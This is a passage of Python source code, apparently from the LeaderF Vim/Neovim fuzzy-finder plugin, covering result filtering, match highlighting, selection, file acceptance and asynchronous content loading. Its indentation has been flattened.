elif self._getExplorer().supportsNameOnly() and self._cli.isFullPath:
step = 6000
else:
step = 12000
pairs = self._filter(step, filter_method, content, is_continue)
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
if self._cli.isAndMode:
self._highlight_method = partial(self._highlight_and_mode, highlight_methods)
self._highlight_method()
else:
self._highlight_method = highlight_method
self._highlight_method()
def _guessFilter(self, filename, suffix, dirname, iterable):
"""
return a list, each item is a pair (weight, line)
"""
return ((FuzzyMatch.getPathWeight(filename, suffix, dirname, line), line) for line in iterable)
def _guessSearch(self, content, is_continue=False, step=0):
if self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
return
buffer_name = os.path.normpath(lfDecode(self._cur_buffer.name))
if lfEval("g:Lf_ShowRelativePath") == '1':
try:
buffer_name = os.path.relpath(buffer_name)
except ValueError:
pass
buffer_name = lfEncode(buffer_name)
dirname, basename = os.path.split(buffer_name)
filename, suffix = os.path.splitext(basename)
if self._fuzzy_engine:
filter_method = partial(fuzzyEngine.guessMatch, engine=self._fuzzy_engine, filename=filename,
suffix=suffix, dirname=dirname, sort_results=True)
step = len(content)
_, self._result_content = self._filter(step, filter_method, content, is_continue, True)
else:
step = len(content)
filter_method = partial(self._guessFilter, filename, suffix, dirname)
pairs = self._filter(step, filter_method, content, is_continue)
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def _highlight_and_mode(self, highlight_methods):
self._clearHighlights()
for i, highlight_method in enumerate(highlight_methods):
highlight_method(hl_group='Lf_hl_match' + str(i % 5))
def _clearHighlights(self):
if self._getInstance().getWinPos() == 'popup':
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._highlight_ids = []
def _clearHighlightsPos(self):
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
def _resetHighlights(self):
self._clearHighlights()
unit = self._getUnit()
bottom = len(self._getInstance().buffer) - self._help_length
if self._cli.isAndMode:
highlight_pos_list = self._highlight_pos_list
else:
highlight_pos_list = [self._highlight_pos]
for n, highlight_pos in enumerate(highlight_pos_list):
hl_group = 'Lf_hl_match' + str(n % 5)
for i, pos in enumerate(highlight_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")""" % (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
for i, pos in enumerate(self._highlight_refine_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")""" % (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _highlight(self, is_full_path, get_highlights, use_fuzzy_engine=False, clear=True, hl_group='Lf_hl_match'):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
if clear:
self._clearHighlights()
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
if use_fuzzy_engine:
self._highlight_pos = get_highlights(source=[getDigest(line)
for line in content[:highlight_number:unit]])
else:
# e.g., self._highlight_pos = [ [ [2,3], [6,2] ], [ [1,4], [7,6], ... ], ... ]
# where [2, 3] indicates the highlight starts at the 2nd column with the
# length of 3 in bytes
self._highlight_pos = [get_highlights(getDigest(line))
for line in content[:highlight_number:unit]]
if self._cli.isAndMode:
self._highlight_pos_list.append(self._highlight_pos)
bottom = len(content)
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 0 if is_full_path else 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")""" % (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
def _highlightRefine(self, first_get_highlights, get_highlights):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
self._clearHighlights()
getDigest = self._getDigest
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
bottom = len(content)
self._highlight_pos = [first_get_highlights(getDigest(line, 1))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_match', %s)")""" % (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_match', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
self._highlight_refine_pos = [get_highlights(getDigest(line, 2))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_refine_pos):
start_pos = self._getDigestStartPos(content[unit*i], 2)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")""" % (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _regexFilter(self, iterable):
def noErrMatch(text, pattern):
try:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text, pattern))
except TypeError: # python 2
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except ValueError: # python 3
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
try:
if ('-2' == lfEval("g:LfNoErrMsgMatch('', '%s')" % escQuote(self._cli.pattern))):
return iter([])
else:
return (line for line in iterable
if noErrMatch(escQuote(self._getDigest(line, 0)), escQuote(self._cli.pattern)))
except vim.error:
return iter([])
def _regexSearch(self, content, is_continue, step):
if not self._cli.isPrefix:
self._index = 0
self._result_content = self._filter(8000, self._regexFilter, content, is_continue)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def clearSelections(self):
for i in self._selections.values():
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % i)
self._selections.clear()
def _cleanup(self):
if not ("--recall" in self._arguments or lfEval("g:Lf_RememberLastSearch") == '1'):
self._pattern_bak = self._cli.pattern
self._cli.clear()
self._clearHighlights()
self._clearHighlightsPos()
self._help_length = 0
self._show_help = False
@modifiableController
def toggleHelp(self):
self._show_help = not self._show_help
if self._getInstance().isReverseOrder():
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._createHelpHint()
self.clearSelections()
self._resetHighlights()
def _accept(self, file, mode, *args, **kwargs):
if file:
if mode == '':
pass
elif mode == 'h':
lfCmd("split")
elif mode == 'v':
lfCmd("bel vsplit")
kwargs["mode"] = mode
tabpage_count = len(vim.tabpages)
self._acceptSelection(file, *args, **kwargs)
for k, v in self._cursorline_dict.items():
if k.valid:
k.options["cursorline"] = v
self._cursorline_dict.clear()
self._issue_422_set_option()
if mode == 't' and len(vim.tabpages) > tabpage_count:
tab_pos = int(lfEval("g:Lf_TabpagePosition"))
if tab_pos == 0:
lfCmd("tabm 0")
elif tab_pos == 1:
lfCmd("tabm -1")
elif tab_pos == 3:
lfCmd("tabm")
def accept(self, mode=''):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if self._getInstance().window.cursor[0] <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if self._getExplorer().getStlCategory() == "Rg" \
and self._getInstance().currentLine == self._getExplorer().getContextSeparator():
return
self._cli.writeHistory(self._getExplorer().getStlCategory())
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
cwd = os.getcwd()
if len(self._selections) > 0:
files = []
for i in sorted(self._selections.keys()):
files.append(self._getInstance().buffer[i-1])
if "--stayOpen" in self._arguments:
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if original buffer is an No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd(winnr())")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = os.getcwd()
if mode == '':
self._accept(files[0], mode)
self._argaddFiles(files)
self._accept(files[0], mode)
else:
for file in files:
self._accept(file, mode)
if os.getcwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
need_exit = True
else:
file = self._getInstance().currentLine
line_nr = self._getInstance().window.cursor[0]
need_exit = self._needExit(file, self._arguments)
if need_exit:
if "--stayOpen" in self._arguments:
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if original buffer is an No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd(winnr())")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = os.getcwd()
self._accept(file, mode, self._getInstance().buffer, line_nr) # for bufTag
if os.getcwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
if need_exit:
self._setAutochdir()
if dir_changed_by_autocmd == False:
self._restoreOrigCwd()
return None
else:
self._beforeExit()
self._content = vim.current.buffer[:]
return False
def _jumpNext(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] > len(instance.buffer) - self._help_length:
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
elif instance.window.cursor[0] == 1: # at the first line
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
self._accept(instance.buffer[instance.window.cursor[0] - 1], "")
else:
if instance.cursorRow > len(instance.buffer) - instance.helpLength:
instance.cursorRow = len(instance.buffer) - instance.helpLength
elif instance.cursorRow == 1: # at the last line
instance.cursorRow = len(instance.buffer) - instance.helpLength
else:
instance.cursorRow -= 1
self._accept(instance.buffer[instance.cursorRow - 1], "")
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(len(instance.buffer) - instance.cursorRow - instance.helpLength + 1, len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length:
instance.window.cursor = (self._help_length + 1, 0)
elif instance.window.cursor[0] == len(instance.buffer): # at the last line
instance.window.cursor = (self._help_length + 1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
self._accept(instance.buffer[instance.window.cursor[0] - 1], "")
else:
if instance.cursorRow <= instance.helpLength:
instance.cursorRow = instance.helpLength + 1
elif instance.cursorRow == len(instance.buffer): # at the last line
instance.cursorRow = instance.helpLength + 1
else:
instance.cursorRow += 1
self._accept(instance.buffer[instance.cursorRow - 1], "")
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
return True
def _jumpPrevious(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] >= len(instance.buffer) - self._help_length:
instance.window.cursor = (1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
self._accept(instance.buffer[instance.window.cursor[0] - 1], "")
else:
if instance.cursorRow >= len(instance.buffer) - instance.helpLength:
instance.cursorRow = 1
else:
instance.cursorRow += 1
self._accept(instance.buffer[instance.cursorRow - 1], "")
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(len(instance.buffer) - instance.cursorRow - instance.helpLength + 1, len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length + 1:
instance.window.cursor = (len(instance.buffer), 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
self._accept(instance.buffer[instance.window.cursor[0] - 1], "")
else:
if instance.cursorRow <= instance.helpLength + 1:
instance.cursorRow = len(instance.buffer)
else:
instance.cursorRow -= 1
self._accept(instance.buffer[instance.cursorRow - 1], "")
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
def quit(self):
self._getInstance().exitBuffer()
self._setAutochdir()
self._restoreOrigCwd()
def refresh(self, normal_mode=True):
self._getExplorer().cleanup()
content = self._getExplorer().getFreshContent()
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
if normal_mode: # when called in Normal mode
self._getInstance().buffer.options['modifiable'] = True
self._clearHighlights()
self._clearHighlightsPos()
self.clearSelections()
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._iteration_end = True
if self._cli.pattern:
self._index = 0
self._search(self._content)
if normal_mode: # when called in Normal mode
self._createHelpHint()
self._resetHighlights()
self._getInstance().buffer.options['modifiable'] = False
def addSelections(self):
nr = self._getInstance().window.number
if self._getInstance().getWinPos() != 'popup':
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
line_nr = self._getInstance().window.cursor[0]
if line_nr <= self._help_length:
lfCmd("norm! j")
return
if line_nr in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (self._selections[line_nr], self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % self._selections[line_nr])
del self._selections[line_nr]
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), line_nr))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % line_nr))
self._selections[line_nr] = id
def selectMulti(self):
orig_line = self._getInstance().window.cursor[0]
nr = self._getInstance().window.number
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
cur_line = int(lfEval("v:mouse_lnum"))
self.clearSelections()
for i in range(min(orig_line, cur_line), max(orig_line, cur_line)+1):
if i > self._help_length and i not in self._selections:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i)))
self._selections[i] = id
def selectAll(self):
line_num = len(self._getInstance().buffer)
if line_num > 300:
lfCmd("echohl Error | redraw | echo ' Too many files selected!' | echohl NONE")
lfCmd("sleep 1")
return
for i in range(line_num):
if i >= self._help_length and i+1 not in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), i+1))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i+1)))
self._selections[i+1] = id
def _gotoFirstLine(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("normal! gg")
def startExplorer(self, win_pos, *args, **kwargs):
arguments_dict = kwargs.get("arguments", {})
self.setArguments(arguments_dict)
self._cli.setNameOnlyFeature(self._getExplorer().supportsNameOnly())
self._cli.setRefineFeature(self._supportsRefine())
if self._getExplorer().getStlCategory() in ["Gtags"]:
if "--update" in self._arguments or "--remove" in self._arguments:
self._getExplorer().getContent(*args, **kwargs)
return
if "--next" in arguments_dict:
if self._jumpNext() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
elif "--previous" in arguments_dict:
if self._jumpPrevious() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
self._cleanup()
if kwargs.get('bang', 0):
self._current_mode = 'NORMAL'
else:
self._current_mode = 'INPUT'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')" % (self._getExplorer().getStlCategory(), self._current_mode))
# lfCmd("echohl WarningMsg | redraw | echo ' searching ...' | echohl NONE")
self._getInstance().setArguments(self._arguments)
empty_query = self._empty_query and self._getExplorer().getStlCategory() in ["File"]
remember_last_status = "--recall" in self._arguments or lfEval("g:Lf_RememberLastSearch") == '1' and self._cli.pattern
if remember_last_status:
content = self._content
self._getInstance().useLastReverseOrder()
win_pos = self._getInstance().getWinPos()
else:
content = self._getExplorer().getContent(*args, **kwargs)
self._getInstance().setCwd(os.getcwd())
if self._getExplorer().getStlCategory() in ["Gtags"] and "--auto-jump" in self._arguments \
and isinstance(content, list) and len(content) == 1:
mode = self._arguments["--auto-jump"][0] if len(self._arguments["--auto-jump"]) else ""
self._accept(content[0], mode)
return
self._index = 0
pattern = kwargs.get("pattern", "") or arguments_dict.get("--input", [""])[0]
self._cli.setPattern(pattern)
self._result_content = []
self._cb_content = []
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
if self._getExplorer().getStlCategory() in ["Rg"] and ("-A" in arguments_dict \
or "-B" in arguments_dict or "-C" in arguments_dict):
self._getInstance().ignoreReverse()
# clear the buffer only when the content is not a list
self._getInstance().enterBuffer(win_pos, not isinstance(content, list))
self._initial_count = self._getInstance().getInitialWinHeight()
self._getInstance().setStlCategory(self._getExplorer().getStlCategory())
self._setStlMode(**kwargs)
self._getInstance().setStlCwd(self._getExplorer().getStlCurDir())
self._getInstance().setPopupStl(self._current_mode)
if not remember_last_status:
self._gotoFirstLine()
self._start_time = time.time()
self._bang_start_time = self._start_time
self._status_start_time = self._start_time
self._bang_count = 0
self._read_content_exception = None
if isinstance(content, list):
self._is_content_list = True
self._read_finished = 2
if len(content[0]) == len(content[0].rstrip("\r\n")):
self._content = content
else:
self._content = [line.rstrip("\r\n") for line in content]
if not remember_last_status:
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlResultsCount(len(self._content))
if not empty_query:
self._getInstance().setBuffer(self._content[:self._initial_count])
if lfEval("has('nvim')") == '1':
lfCmd("redrawstatus")
self._callback = self._workInIdle
if not kwargs.get('bang', 0):
self.input()
else:
if not remember_last_status and not empty_query:
self._getInstance().appendBuffer(self._content[self._initial_count:])
elif remember_last_status and len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
lfCmd("echo")
if self._cli.pattern:
self._cli._buildPrompt()
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
if not self._cli.pattern and empty_query:
self._gotoFirstLine()
self._guessSearch(self._content)
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
elif isinstance(content, AsyncExecutor.Result):
self._is_content_list = False
self._callback = self._workInIdle
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
if self._getExplorer().getStlCategory() in ["Rg", "Gtags"]:
if "--append" in self.getArguments():
self._offset_in_content = len(self._content)
if self._pattern_bak:
self._getInstance().setBuffer(self._content, need_copy=False)
self._createHelpHint()
else:
self._getInstance().clearBuffer()
self._content = []
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
self._stop_reader_thread = False
self._reader_thread = threading.Thread(target=self._readContent, args=(content,))
self._reader_thread.daemon = True
self._reader_thread.start()
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
else:
self._is_content_list = False
self._callback = partial(self._workInIdle, content)
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
def _readContent(self, content):
try:
for line in content:
self._content.append(line)
if self._stop_reader_thread:
break
else:
self._read_finished = 1
except Exception:
self._read_finished = 1
self._read_content_exception = sys.exc_info()
def _setResultContent(self):
if len(self._result_content) > len(self._getInstance().buffer):
self._getInstance().setBuffer(self._result_content)
elif self._index == 0:
self._getInstance().setBuffer(self._content, need_copy=True)
@catchException
def _workInIdle(self, content=None, bang=False):
if self._read_content_exception is not None:
if bang == True:
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
lfPrintError(self._read_content_exception[1])
return
else:
raise self._read_content_exception[1]
if self._is_content_list:
if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0):
if self._fuzzy_engine:
step = 40000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
return
if content:
i = -1
for i, line in enumerate(itertools.islice(content, 20)):
self._content.append(line)
if i == -1:
self._read_finished = 1
if self._read_finished > 0:
if self._read_finished == 1:
self._read_finished += 1
self._getExplorer().setContent(self._content)
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlRunning(False)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
if bang:
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] != b'':
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
self._getInstance().setBuffer(self._content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._content))
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < len(self._content) or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 40000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
if bang:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
cur_len = len(self._content)
if time.time() - self._start_time > 0.1:
self._start_time = time.time()
self._getInstance().setStlTotal(cur_len//self._getUnit())
if time.time() - self._status_start_time > 0.45:
self._status_start_time = time.time()
self._getInstance().setStlRunning(True)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
else:
self._getInstance().setStlResultsCount(cur_len)
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < cur_len or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 40000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content[:cur_len], True, step)
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._getInstance().getWinPos() not in ('popup', 'floatwin') and time.time() - self._bang_start_time > 0.5:
self._bang_start_time = time.time()
lfCmd("echohl WarningMsg | redraw | echo ' searching %s' | echohl NONE" % ('.' * self._bang_count))
self._bang_count = (self._bang_count + 1) % 9
elif len(self._getInstance().buffer) < min(cur_len, self._initial_count):
self._getInstance().setBuffer(self._content[:self._initial_count])
@modifiableController
def input(self):
self._current_mode = 'INPUT'
self._getInstance().hideMimicCursor()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')" % (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().getWinPos() == 'popup':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')"
% (self._getInstance().getPopupWinId(), 'leaderf#PopupFilter'))
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._hideHelp()
self._resetHighlights()
if self._cli.pattern: # --input xxx or from normal mode to input mode
if self._index == 0: # --input xxx
self._search(self._content)
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
for cmd in self._cli.input(self._callback):
cur_len = len(self._content)
cur_content = self._content[:cur_len]
if equal(cmd, '<Update>'):
if self._getInstance().getWinPos() == 'popup':
if self._getInstance()._window_object.cursor[0] > 1:
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
self._search(cur_content)
elif equal(cmd, '<Shorten>'):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Mode>'):
self._setStlMode()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
